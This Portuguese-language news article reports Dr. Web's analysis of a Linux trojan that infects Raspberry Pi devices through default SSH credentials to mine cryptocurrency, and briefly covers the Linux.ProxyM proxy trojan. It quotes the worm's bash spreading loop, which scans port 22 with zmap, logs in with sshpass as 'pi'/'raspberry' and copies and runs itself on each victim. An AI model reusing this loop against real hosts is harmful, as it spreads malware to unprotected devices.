Malware Linux foca em equipamentos Raspberry Pi para mineração de CryptoCurrency

Photo of Malware Linux foca em equipamentos Raspberry Pi para mineração de CryptoCurrency
Facebook
VKontakte
share_fav

Pesquisadores de malware do fabricante de antivírus russo Dr. Web descobriram um novo Trojan para Linux, rastreado como KinuX.MulDrop.14, que está infectando dispositivos Raspberry Pi com a finalidade de minerar cryptocurrency. De acordo com a Dr. Web, o malware foi visto pela primeira vez online em maio; os pesquisadores descobriram um script contendo um aplicação compactada e criptografada.

O malware KinuX.MulDrop.14 tem como alvo dispositivos Raspberry Pi não protegidos que possuem portas SSH abertas para conexões externas.

Uma vez que o malware infecta o dispositivo, ele irá primeiro alterar a senha da conta “pi” para:

\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1

Em seguida, o malware desliga vários processos e instala bibliotecas como ZMap e SSHPass que ele usa para suas operações.

“O Trojan Linux que é um script bash contendo um programa de mineração, que é compactado com gzip e criptografado com base64. Uma vez iniciado, o script encerra vários processos e instala bibliotecas necessárias para sua operação”, afirmou a análise publicada pela Dr Web.

Ele muda a senha do usuário “pi” para “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1”

O malware, em seguida, inicia um processo de mineração cryptocurrency, mas usa o ZMap para digitalizar a Internet para infectar outros dispositivos.

Toda vez que o malware encontra um dispositivo de Raspberry Pi na Internet, ele usa o sshpass para tentar fazer logon usando o nome de usuário padrão “pi” e a senha “raspiberry”.

O código malicioso só tenta usar esse par de valores. Isso sugere que o malware alveja apenas dispositivos Raspberry Pi. Especialistas acreditam que o malware poderia ser melhorado e que pode ser usado nas próximas semanas para atingir outras plataformas.

Abaixo vemos parte do código compartilhado pela Dr. Web:

NAME=`mktemp -u 'XXXXXXXX'` 
while [ true ]; do 
FILE=`mktemp` 
zmap -p 22 -o $FILE -n 100000 
killall ssh scp 
for IP in `cat $FILE` 
do 
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & 
done 
rm -rf $FILE 
sleep 10 
done

Os pesquisadores também analisaram um segundo malware para Linux, apelidado de Linux.ProxyM que foi usado para criar uma rede proxy.

O código malicioso inicia um servidor proxy SOCKS em dispositivos infectados usados para retransmitir o tráfego malicioso, disfarçando sua real fonte.

“O outro Trojan foi nomeado de Linux.ProxyM. ataques envolvendo este trojan foram observados desde Fevereiro de 2017, mas atingiram o pico no final de Maio. O gráfico abaixo mostra quantos ataques foram feitas pelo Linux.ProxyM e identificados pelos especialistas da Doctor Web”, afirmou a Dr. Web.

De acordo com a Dr. Web, o número de dispositivos infectados com o Linux.ProxyM atingiu 10 mil unidades desde a sua descoberta em fevereiro de 2017.

ver iMasters
#linux
#raspberry pi
#segurança
#open hardware